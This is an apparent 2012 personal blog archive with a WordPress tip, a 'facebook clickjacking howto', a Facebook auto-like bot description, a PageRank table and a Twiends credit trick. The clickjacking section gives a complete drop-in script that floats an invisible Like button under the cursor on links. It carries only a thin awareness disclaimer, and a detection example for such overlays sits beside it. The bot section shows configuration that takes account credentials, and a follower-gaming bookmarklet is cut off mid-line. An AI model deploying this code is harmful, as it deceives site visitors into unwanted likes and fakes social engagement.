03 January 2012

How to move WordPress to a subdirectory

Have you ever needed to install WordPress in a subdirectory/subfolder, or to replicate a previous WordPress installation, and simply couldn’t get it to work?

1) Let’s assume your site is magro.ic21.eu and you need to install it to magro.ic21.eu/foobar
2) Create the subdirectory (I named it foobar)
3) Move all files from the previous wordpress directory to foobar
4) You’ll notice that magro.ic21.eu/foobar will not have any posts displayed and wp-admin will not work.
5) Go to the MySQL prompt and issue the following command:
update wp_options set option_value='http://magro.ic21.eu/foobar' where option_name = 'home' or option_name = 'siteurl';

NOTE: You need to replace magro.ic21.eu/foobar with your own site/subdirectory name!!!

facebook clickjacking howto

facebook clickjacking howto allows setting up a website where users will do a facebook like without their knowledge when clicking any link on the page. This works by dragging an invisible (very low opacity) facebook like button below the mouse when the user hovers a link.

How it works

Since we cannot inject css or javascript inside the facebook iframe, we cannot change the cursor:pointer css property when the mouse is over the like button, so it would be suspicious to have a page always with a clicking-hand mouse cursor. The workaround was making the like button follow the mouse when it’s normal to have a clicking-hand mouse cursor (cursor:pointer) such as when hovering a link!

After clicking a link, the user will like the current page in facebook and will in fact be redirected to the href (through javascript magic – document.location.href) and a cookie will be defined so that the facebook like button no longer appears in future page loads.

Mitigation

The purpose of this script is to create a discussion about how to PREVENT clickjacking. By using this script for any reason other than security debugging you might be violating Facebook Terms and Service Statements and might lose your Facebook account.

As such, the code below is easily found on the web if you use it on your website, and I’ll personally report you if you use it for malicious reasons.
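
On the prevention side, the overlay described under "How it works" leaves a recognisable trace in a page's markup: a Like widget wrapped in a floating, nearly transparent container. The following check is an added example, not part of the original post; the function names, the 0.1 opacity threshold and the sample markup are assumptions made for illustration.

```javascript
// Added example: static heuristic for the overlay pattern described above.
// Function names and the 0.1 threshold are assumptions, not from the post.
const WIDGET_PATTERNS = [/<fb:like\b/i, /facebook\.com\/plugins\/like\.php/i];

// Turn an inline style attribute into a { property: value } map.
function parseInlineStyle(style) {
  const props = {};
  for (const decl of style.split(';')) {
    const idx = decl.indexOf(':');
    if (idx === -1) continue;
    props[decl.slice(0, idx).trim().toLowerCase()] = decl.slice(idx + 1).trim().toLowerCase();
  }
  return props;
}

// Lowest opacity declared through the standard or legacy properties.
function effectiveOpacity(props) {
  const values = ['opacity', '-moz-opacity', '-khtml-opacity']
    .filter((key) => key in props)
    .map((key) => parseFloat(props[key]));
  const ie = /alpha\(opacity=(\d+)\)/.exec(props.filter || '');
  if (ie) values.push(parseInt(ie[1], 10) / 100);
  const valid = values.filter((v) => !Number.isNaN(v));
  return valid.length ? Math.min(...valid) : 1;
}

// Report floating, near-invisible containers that wrap a Like widget.
function findHiddenWidgetOverlays(html, maxOpacity = 0.1) {
  const findings = [];
  const re = /<(div|span)\b[^>]*\bstyle\s*=\s*"([^"]*)"[^>]*>([\s\S]*?)<\/\1>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const props = parseInlineStyle(m[2]);
    const opacity = effectiveOpacity(props);
    const floating = props.position === 'absolute' || props.position === 'fixed';
    const hasWidget = WIDGET_PATTERNS.some((p) => p.test(m[3]));
    if (hasWidget && floating && opacity <= maxOpacity) {
      findings.push({ tag: m[1].toLowerCase(), opacity });
    }
  }
  return findings;
}

// Constructed sample markup: one suspicious overlay, one ordinary visible button.
const SAMPLE_PAGE =
  '<div id="overlay" style="position:absolute;opacity:0.01;filter:alpha(opacity=1);">' +
  '<fb:like layout="button_count"></fb:like></div>' +
  '<div id="sidebar" style="position:relative;"><fb:like></fb:like></div>';

console.log(findHiddenWidgetOverlays(SAMPLE_PAGE));
```

This only inspects inline styles in static markup. Opacity set from a stylesheet or by script at runtime needs the same test applied to computed styles in a rendered page.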

What we’ll see in the future

Before discussing how clickjacking will evolve, there is an important assumption to keep in mind: it’s possible to share a website not directly connected to where the like button is placed, meaning I might place a like button in fernandomagro.com liking another website/domain.

So, it’s possible to create a database of websites and generate a lot of different like buttons consecutively in the same website.

Wrapping it all up, when Facebook Clickjacking goes viral, I believe we will start seeing consecutive clickjacking likes/shares from malicious websites with huge galleries where a lot of clicking takes place. Example: having a gallery with 500 interesting pictures, imagine clicking those galleries for 2 hours and then returning to facebook and realizing the account was flooded with a huge amount of unrequested likes.

Install it

I managed to wrap it all up around a nice javascript file that you just need to include to make it work in your webpage.

Change the headers of your webpage with the following:

<script src="http://code.jquery.com/jquery-1.5.js"></script>
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
<script>window.DO_CLICKJACKING = 1</script>
<script src="clickjacking.js"></script>


Then, download the file clickjacking.js and put it in an accessible folder:

var $J = jQuery.noConflict(); 

// solve: images and floating divs
function heightestChild(elem)
{
var t=0;
var t_elem;
$J("*",elem).each(function () {
if ( $J(this).outerHeight(true) > t ) {
t_elem=$J(this);
t=t_elem.outerHeight(true);
}
});
// we care about the heighest
if (elem.outerHeight(true) > t)
{
t = elem.outerHeight(true);
}

//return elem.outerHeight(true);
return t+3; // hotfix
}

function highestOffsetTop(elem)
{
var t=elem.offset().top;
var t_elem;
$J("*",elem).each(function () {
if ( $J(this).offset().top < t ) {
t_elem=$J(this);
t=t_elem.offset().top;
}
});
// we only care about the object that is most on top
if (elem.offset().top < t)
{
t = elem.offset().top;
}

//return elem.offset().top;
return t+3;
}

// 57 19 63

$J(document).ready(function(){
if (window.DO_CLICKJACKING) { // wrap up EVERYTHING

/*$J("body").append('<div id="clickjacking" style="position:absolute;display:block;opacity:0.01;-khtml-opacity:.01;-moz-opacity:.01;filter:alpha(opacity=1);"><fb:like layout="button_count" show_faces="false" width="100"></fb:like></div>');*/
$J("body").append('<div id="clickjacking" style="position:absolute;display:block;"><fb:like layout="button_count" show_faces="false" width="100"></fb:like></div>');

var elementWidth = 0;
var elementHeight = 0;
var theElement = '';
var likeDone = 0;

if ($J.cookie("clickjacking_"+escape(document.URL)) == 1)
{
likeDone = 1;
}

// fired when the user clicks a link (likes our page) -> clickjacking is done
FB.Event.subscribe('edge.create', function(response) {
$J("#clickjacking").css("display", "none");
likeDone = 1;
$J.cookie("clickjacking_"+escape(document.URL), "1");
// let the user actually go to the link he clicked.
window.location.href = theElement.attr('href');
});

$J(document).mousemove(function(event) {
if (theElement != '')
{
if (event.pageY < (highestOffsetTop(theElement)-4) || event.pageY > (highestOffsetTop(theElement) + heightestChild(theElement)) || event.pageX < theElement.offset().left || event.pageX > (theElement.offset().left + theElement.width()) )
{
//alert(event.pageY + " " + theElement.height() + " " + theElement.offset().top);
/* $J("#log").append("<p>mouse off the element LEFT " + event.pageX + " " + theElement.offset().left + " " + (theElement.offset().left + theElement.width()) + "</p>");
$J("#log").append("<p>mouse off the element TOP " + event.pageY + " " + highestOffsetTop(theElement) + " " + (highestOffsetTop(theElement) + heightestChild(theElement,true)) + "</p>");*/
theElement = ''; // the mouse is off theElement
$J("#clickjacking").css("display", "none");
}
else
{
if ($J.browser.msie) {
$J("#clickjacking").css("top",(event.pageY-15)+"px");
$J("#clickjacking").css("left",(event.pageX-20)+"px");
}
else
{
$J("#clickjacking").css("top",(event.pageY-5)+"px");
$J("#clickjacking").css("left",(event.pageX-20)+"px");
}
}
}
});

$J(document).delegate("a","mouseenter", function (){
// register mouse is inside element
if (likeDone == 0)
{
theElement = $J(this);
$J("#clickjacking").css("display", "block");
}
});

} // window.DO_CLICKJACKING
});

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/licenses/gpl.html
*
*/

/**
* Create a cookie with the given name and value and other optional parameters.
*
* @example $.cookie('the_cookie', 'the_value');
* @desc Set the value of a cookie.
* @example $.cookie('the_cookie', 'the_value', { expires: 7, path: '/', domain: 'jquery.com', secure: true });
* @desc Create a cookie with all available options.
* @example $.cookie('the_cookie', 'the_value');
* @desc Create a session cookie.
* @example $.cookie('the_cookie', null);
* @desc Delete a cookie by passing null as value. Keep in mind that you have to use the same path and domain
* used when the cookie was set.
*
* @param String name The name of the cookie.
* @param String value The value of the cookie.
* @param Object options An object literal containing key/value pairs to provide optional cookie attributes.
* @option Number|Date expires Either an integer specifying the expiration date from now on in days or a Date object.
* If a negative value is specified (e.g. a date in the past), the cookie will be deleted.
* If set to null or omitted, the cookie will be a session cookie and will not be retained
* when the the browser exits.
* @option String path The value of the path atribute of the cookie (default: path of page that created the cookie).
* @option String domain The value of the domain attribute of the cookie (default: domain of page that created the cookie).
* @option Boolean secure If true, the secure attribute of the cookie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {
value = '';
options.expires = -1;
}
var expires = '';
if (options.expires && (typeof options.expires == 'number' || options.expires.toUTCString)) {
var date;
if (typeof options.expires == 'number') {
date = new Date();
date.setTime(date.getTime() + (options.expires * 24 * 60 * 60 * 1000));
} else {
date = options.expires;
}
expires = '; expires=' + date.toUTCString(); // use expires attribute, max-age is not supported by IE
}
// CAUTION: Needed to parenthesize options.path and options.domain
// in the following expressions, otherwise they evaluate to undefined
// in the packed version for some reason...
var path = options.path ? '; path=' + (options.path) : '';
var domain = options.domain ? '; domain=' + (options.domain) : '';
var secure = options.secure ? '; secure' : '';
document.cookie = [name, '=', encodeURIComponent(value), expires, path, domain, secure].join('');
} else { // only name given, get cookie
var cookieValue = null;
if (document.cookie && document.cookie != '') {
var cookies = document.cookie.split(';');
for (var i = 0; i < cookies.length; i++) {
var cookie = jQuery.trim(cookies[i]);
// Does this cookie string begin with the name we want?
if (cookie.substring(0, name.length + 1) == (name + '=')) {
cookieValue = decodeURIComponent(cookie.substring(name.length + 1));
break;
}
}
}
return cookieValue;
}
};

Facebook auto like script

facebook auto like script is a php script that allows liking friends’ posts, an external page, or all posts in a facebook page with some level of randomness. The script comes in two versions: like friends posts (iterates a user’s wall to like friends’ posts) and like external pages (iterates an RSS feed to retrieve external links to like).

Important update: if you’re looking for a way to automatically STEAL facebook likes from users that visit your website, then you should also read my facebook clickjacking howto blog post. I wrote it to raise awareness for this issue. You should try to understand it and focus on how to prevent it.

Like friends posts

The script runs in the background and checks a user’s facebook page at random intervals of seconds to see if new posts were added; if so, a coin-flip with a user-defined probability value decides whether those posts should be liked.

Like Friends Posts configurations
$login_email = "CHANGE THIS TO your-login-email";
$login_pass = "CHANGE THIS TO your-password";
$users = Array(
"CHANGE THIS TO A FRIEND'S USERNAME" => 0.5,
"CHANGE THIS TO A FRIEND'S USERNAME" => 0.9,
"CHANGE THIS TO A FRIEND'S USERNAME" => 0.4,
"CHANGE THIS TO A FRIEND'S USERNAME" => 0.2,
);

That means that username1’s posts will have a 50% chance to be liked, username2’s posts will have a 90% chance to be liked, and so on.
Remember to replace your-login-email and your-password with the actual email and facebook password.

Like Friends Posts Code

Updated 11/01/2011

CODE REMOVED MARCH 1, 2011 BY FACEBOOK'S REQUEST -- check out the letter they sent me

I asked that for taking down the code they'd donate 5000€ for charity. Unfortunately I didn't get any response from the lawyers until now but I'll remove the code anyway (I'm just a nice guy).

Like External Pages


Like external pages uses a URL like http://www.facebook.com/plugins/like.php?href=some_URL to inject a list of URLs automatically, without human interaction.

Like External Pages configurations
CODE REMOVED MARCH 1, 2011 BY FACEBOOK'S REQUEST -- check out the letter they sent me

I asked that for taking down the code they'd donate 5000€ for charity. Unfortunately I didn't get any response from the lawyers until now but I'll remove the code anyway (I'm just a nice guy).

Like External Pages tweaks

You can tweak your script to work with the different types of RSS feeds. Right now it’s optimized for feedburner, where there is a <feedburner:origLink> element; however, if you have some other type of RSS feed, you can comment out that line in the script and uncomment the line referring to <link>. Locate the following in the above script:

#preg_match_all("/<feedburner:origLink>([^<]+)<\/feedburner:origLink>/", $feed, $links);
preg_match_all("/<link>([^<]+)<\/link>/", $feed, $links);

Like all posts in a facebook wall page


By user request I made a modification in the initial script so that it crawls a facebook page and goes 5 pages deep liking every post it finds. To set it up, you need to change the header of the script like the other ones, but now there’s something else because you’ll have to fill in the page you want to crawl.

1º Go to the page you want to crawl
2º Copy the URL
3º Paste the url in $fbpage
4º Change www.facebook.com to m.facebook.com

Important notes as of 23/Jan/2011: facebook blocks liking several posts at once from a certain page, so I added a sleep timer so the urls are not fetched all at once, not sure it will help; You must remember to like the page itself before liking its posts, otherwise the like button won’t be available for the posts and the script won’t see it.

Dummies and windows users


1º Install PHP windows binaries
2º During the installation select “Do not setup a web server”
3º Download the script you wish from this post
4º Open it with WORDPAD (must be wordpad, notepad will give you everything without newlines)
5º Change the first lines of the script where it says /* ———– USER CONFIGURATIONS ———— */
6º Open cmd.exe (Start menu -> run -> cmd)
7º Locate the path where you extracted the script, example: C:\fbautolike\fbautolike.php
8º Type number 9º
9º php C:\fbautolike\fbautolike.php

Note: if you get a message saying “Could not open input file” then you’re typing the path wrong. To check if PHP is installed correctly, type: php -v

02 January 2012

Table of links needed for a given PR

PageRank table

PR, or PageRank, is the measure of importance that Google assigns to a site. The more inbound links a site has, the more PR it gets, but this depends on the PR of the sites that link to yours. This table shows that one inbound link from a page with PR 5 instantly gives you PR 3, whereas achieving the same with inbound links from PR 1 pages takes 555.

Twiends credit generator

Twiends is a Twitter follower-exchange community. This is not the place to explain the importance of having Twitter accounts with thousands of followers, so here is the method for getting them through these exchange communities and, especially on twiends, for earning credits so that people follow us.

First choose one of these URLs, replacing country with the country you want

http://twiends.com/all

http://twiends.com/country

Once there, put the following code in the browser’s location bar.

javascript: /* nemsis 4 bhw */ function tr_f() { var followlinks = []; for (var i=0; i < document.links.length; i++) {if (document.links[i].getAttribute("class")=="follow"){followlinks[followlinks.length] = document.links[i];}} /* nemsis 4 bhw */ for (var i=0; i